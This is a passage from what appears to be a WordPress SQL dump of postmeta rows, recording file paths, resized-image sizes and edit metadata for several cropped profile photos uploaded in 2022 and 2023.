wn}}'),(2489,1774,'_wp_attached_file','2023/10/Eliza-Schuh.jpg'),(2490,1774,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:23:\"2023/10/Eliza-Schuh.jpg\";s:8:\"filesize\";i:81335;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Eliza-Schuh-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13076;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Eliza-Schuh-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4654;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"Eliza-Schuh-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53502;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2503,1778,'_wp_attached_file','2023/10/cropped-cropped-Eliza-Schuh-e1697208271242.jpg'),(2504,1778,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:54:\"2023/10/cropped-cropped-Eliza-Schuh-e1697208271242.jpg\";s:8:\"filesize\";i:13203;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-Eliza-Schuh-e1697208271242-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4532;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2505,1778,'_oembed_423c9533c86fa6bd7b01a9daa47eb548','{{unknown}}'),(2506,1779,'_wp_attached_file','2022/03/cropped-cropped-Anvith-e1697208489419.jpg'),(2507,1779,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:49:\"2022/03/cropped-cropped-Anvith-e1697208489419.jpg\";s:8:\"filesize\";i:96143;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"cropped-cropped-Anvith-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28290;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"cropped-cropped-Anvith-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9042;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2508,1779,'_oembed_fd977c143722b3b8c1c8b0d11f8146ba','{{unknown}}'),(2509,1779,'_edit_lock','1697208351:1'),(2510,1779,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:657;s:6:\"height\";i:657;s:4:\"file\";s:26:\"cropped-cropped-Anvith.jpg\";}}'),(2511,1779,'_edit_last','1'),(2512,1780,'_wp_attached_file','2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg'),(2513,1780,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:57:\"2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\";s:8:\"filesize\";i:28266;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:57:\"cropped-cropped-cropped-Anvith-e1697208489419-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8508;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2514,1780,'_oembed_fd977c143722b3b8c1c8b0d11f8146ba','{{unknown}}'),(2515,1781,'_wp_attached_file','2022/03/cropped-Alex-e1697208598736.jpg'),(2516,1781,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:39:\"2022/03/cropped-Alex-e1697208598736.jpg\";s:8:\"filesize\";i:61786;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"cropped-Alex-e1697208586774-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10622;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"cropped-Alex-e1697208586774-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4264;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"cropped-Alex-e1697208586774-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39605;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2517,1781,'_oembed_d7f75a8f652db0589c33375dc5545cab','{{unknown}}'),(2518,1781,'_edit_lock','1697208476:1'),(2519,1781,'_wp_attachment_backup_sizes','a:5:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1016;s:6:\"height\";i:1017;s:4:\"file\";s:16:\"cropped-Alex.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:24:\"cropped-Alex-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4268;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:24:\"cropped-Alex-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10637;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:24:\"cropped-Alex-768x769.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40060;}s:18:\"full-1697208598736\";a:3:{s:5:\"width\";i:1015;s:6:\"height\";i:1015;s:4:\"file\";s:31:\"cropped-Alex-e1697208586774.jpg\";}}'),(2520,1781,'_edit_last','1'),(2521,1782,'_wp_attached_file','2022/03/cropped-cropped-Alex-e1697208598736.jpg'),(2522,1782,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:299;s:6:\"height\";i:300;s:4:\"file\";s:47:\"2022/03/cropped-cropped-Alex-e1697208598736.jpg\";s:8:\"filesize\";i:10653;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"cropped-cropped-Alex-e1697208598736-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4164;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2523,1782,'_oembed_d7f75a8f652db0589c33375dc5545cab','{{unknown}}'),(2524,1783,'_wp_attached_file','2022/03/cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg'),(2525,1783,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:58:\"2022/03/cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\";s:8:\"filesize\";i:372995;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"cropped-cropped-Bhavya-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12203;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"cropped-cropped-Bhavya-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99087;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"cropped-cropped-Bhavya-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4123;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"cropped-cropped-Bhavya-scaled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60763;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:45:\"cropped-cropped-Bhavya-scaled-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190735;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:45:\"cropped-cropped-Bhavya-scaled-1-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:295435;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2526,1783,'_oembed_85b89555abc0cccd6416679a9a430607','{{unknown}}'),(2527,1783,'_edit_lock','1697208532:1'),(2528,1783,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2380;s:6:\"height\";i:2380;s:4:\"file\";s:35:\"cropped-cropped-Bhavya-scaled-1.jpg\";}}'),(2529,1783,'_edit_last','1'),(2530,1784,'_wp_attached_file','2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg'),(2531,1784,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:66:\"2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\";s:8:\"filesize\";i:12196;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4016;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2532,1784,'_oembed_85b89555abc0cccd6416679a9a430607','{{unknown}}'),(2533,1785,'_wp_attached_file','2022/03/cropped-cropped-Vineeth-e1697208720256.jpg'),(2534,1785,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:50:\"2022/03/cropped-cropped-Vineeth-e1697208720256.jpg\";s:8:\"filesize\";i:257576;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-Vineeth-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15163;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"cropped-cropped-Vineeth-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107710;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-Vineeth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5852;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-Vineeth-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66476;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:37:\"cropped-cropped-Vineeth-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210863;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2535,1785,'_oembed_b66876ffc97f4d22e8b56716b4a46bd2','{{unknown}}'),(2536,1785,'_edit_lock','1697208580:1'),(2537,1785,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1683;s:6:\"height\";i:1683;s:4:\"file\";s:27:\"cropped-cropped-Vineeth.jpg\";}}'),(2538,1785,'_edit_last','1'),(2539,1786,'_wp_attached_file','2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg'),(2540,1786,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:58:\"2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\";s:8:\"filesize\";i:15144;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"cropped-cropped-cropped-Vineeth-e1697208720256-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5635;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2541,1786,'_oembed_b66876ffc97f4d22e8b56716b4a46bd2','{{unknown}}'),(2542,1787,'_wp_attached_file','2022/04/cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg'),(2543,1787,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:61:\"2022/04/cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\";s:8:\"filesize\";i:422426;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"cropped-cropped-sathwik-2-scaled-1-e1697208790642-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16482;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"cropped-cropped-sathwik-2-scaled-1-e1697208790642-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130958;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"cropped-cropped-sathwik-2-scaled-1-e1697208790642-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7800;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"cropped-cropped-sathwik-2-scaled-1-e1697208790642-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75544;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"cropped-cropped-sathwik-2-scaled-1-e1697208790642-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271855;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"iPhone 12 Pro Max\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646940899\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2544,1787,'_oembed_c0de30b09b8d9221f23cb02551fd0932','{{unknown}}'),(2545,1787,'_edit_lock','1697208687:1'),(2546,1787,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1918;s:6:\"height\";i:1921;s:4:\"file\";s:38:\"cropped-cropped-sathwik-2-scaled-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:46:\"cropped-cropped-sathwik-2-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7801;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:46:\"cropped-cropped-sathwik-2-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16479;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:46:\"cropped-cropped-sathwik-2-scaled-1-768x769.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76532;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:48:\"cropped-cropped-sathwik-2-scaled-1-1022x1024.jpg\";s:5:\"width\";i:1022;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131279;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:48:\"cropped-cropped-sathwik-2-scaled-1-1534x1536.jpg\";s:5:\"width\";i:1534;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:272932;}s:18:\"full-1697208827396\";a:3:{s:5:\"width\";i:1917;s:6:\"height\";i:1917;s:4:\"file\";s:53:\"cropped-cropped-sathwik-2-scaled-1-e1697208790642.jpg\";}}'),(2547,1787,'_edit_last','1'),(2548,1788,'_wp_attached_file','2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg'),(2549,1788,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:299;s:6:\"height\";i:300;s:4:\"file\";s:69:\"2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\";s:8:\"filesize\";i:16418;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:69:\"cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7732;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"iPhone 12 Pro Max\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646940899\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.5\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2550,1788,'_oembed_c0de30b09b8d9221f23cb02551fd0932','{{unknown}}'),(2551,1789,'_wp_attached_file','2022/03/cropped-cropped-Brindal-e1697208968672.jpeg'),(2552,1789,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:51:\"2022/03/cropped-cropped-Brindal-e1697208968672.jpeg\";s:8:\"filesize\";i:317082;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"cropped-cropped-Brindal-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14046;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"cropped-cropped-Brindal-1024x1024.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159468;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"cropped-cropped-Brindal-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4694;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"cropped-cropped-Brindal-768x768.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2553,1789,'_oembed_7d7387c448f0cc903230267b24b3e3c4','{{unknown}}'),(2554,1789,'_edit_lock','1697208969:1'),(2555,1789,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1328;s:6:\"height\";i:1328;s:4:\"file\";s:28:\"cropped-cropped-Brindal.jpeg\";}}'),(2556,1789,'_edit_last','1'),(2557,1790,'_wp_attached_file','2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg'),(2558,1790,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:59:\"2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\";s:8:\"filesize\";i:14025;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"cropped-cropped-cropped-Brindal-e1697208968672-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4556;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2559,1790,'_oembed_7d7387c448f0cc903230267b24b3e3c4','{{unknown}}'),(2560,1791,'_wp_attached_file','2022/03/cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg'),(2561,1791,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:67:\"2022/03/cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\";s:8:\"filesize\";i:447242;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12952;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-ruby_parcells-scaled-1-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112827;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5887;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62404;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-ruby_parcells-scaled-1-2-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264675;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2562,1791,'_oembed_55bd757842f447f6296ab9cafb9673fd','{{unknown}}'),(2563,1791,'_edit_lock','1697208967:1'),(2564,1791,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1919;s:6:\"height\";i:1919;s:4:\"file\";s:44:\"cropped-cropped-ruby_parcells-scaled-1-2.jpg\";}}'),(2565,1791,'_edit_last','1'),(2566,1792,'_wp_attached_file','2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg'),(2567,1792,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:75:\"2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\";s:8:\"filesize\";i:12930;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:75:\"cropped-cropped-cropped-ruby_parcells-scaled-1-